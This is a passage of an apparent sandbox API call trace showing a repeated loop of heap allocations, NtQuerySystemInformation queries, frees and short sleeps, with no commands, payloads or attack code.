ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.550] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.550] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0214.550] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.550] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.550] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0214.550] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.551] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.551] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0214.552] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0214.552] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.552] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0214.553] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.553] Sleep (dwMilliseconds=0x110) [0214.607] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0214.607] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.608] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.608] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0214.608] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.609] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.609] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0214.609] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.609] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.610] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0214.610] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0214.611] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0214.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.612] Sleep (dwMilliseconds=0x110) [0214.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0214.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0214.628] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.629] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.629] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0214.629] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.629] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.630] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0214.630] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0214.630] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.630] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0214.631] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.631] Sleep (dwMilliseconds=0x110) [0214.638] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0214.638] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.638] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.638] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0214.638] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.639] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.639] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0214.639] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.639] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.639] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0214.639] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0214.640] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.640] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0214.640] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.640] Sleep (dwMilliseconds=0x110) [0214.669] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0214.669] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.670] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.670] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0214.670] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.670] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.670] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0214.670] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.671] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0214.672] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0214.672] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.677] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0214.677] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.678] Sleep (dwMilliseconds=0x110) [0214.693] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0214.693] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.693] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.693] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0214.693] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.694] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.694] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0214.694] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.694] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.695] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0214.695] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0214.695] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.695] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0214.696] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.696] Sleep (dwMilliseconds=0x110) [0214.701] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0214.701] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.702] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.702] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0214.702] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.702] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.702] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0214.702] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.703] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.703] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0214.703] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0214.704] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.704] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0214.704] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.705] Sleep (dwMilliseconds=0x110) [0214.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0214.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.717] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0214.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.722] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0214.722] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.722] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.723] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0214.723] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0214.724] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.724] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0214.724] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.724] Sleep (dwMilliseconds=0x110) [0214.735] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0214.735] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0214.736] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0214.736] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0214.737] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0214.738] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.738] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0214.739] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.739] Sleep (dwMilliseconds=0x110) [0214.749] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0214.749] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.750] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.750] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0214.750] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.750] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.750] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0214.750] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.751] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.751] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0214.752] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0214.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0214.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.753] Sleep (dwMilliseconds=0x110) [0214.794] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0214.794] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.795] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0214.799] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0214.799] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0214.800] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0214.801] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.801] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0214.802] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.802] Sleep (dwMilliseconds=0x110) [0214.818] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0214.818] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.819] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.819] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0214.819] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.819] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.819] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0214.819] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.820] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.820] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0214.820] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0214.821] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.821] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0214.822] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.822] Sleep (dwMilliseconds=0x110) [0214.834] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0214.834] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.834] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.838] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0214.838] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.839] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.839] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0214.839] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.839] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.839] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0214.840] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0214.841] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.842] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0214.843] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.843] Sleep (dwMilliseconds=0x110) [0214.860] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0214.860] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0214.861] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0214.862] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0214.863] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0214.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.863] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0214.864] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.864] Sleep (dwMilliseconds=0x110) 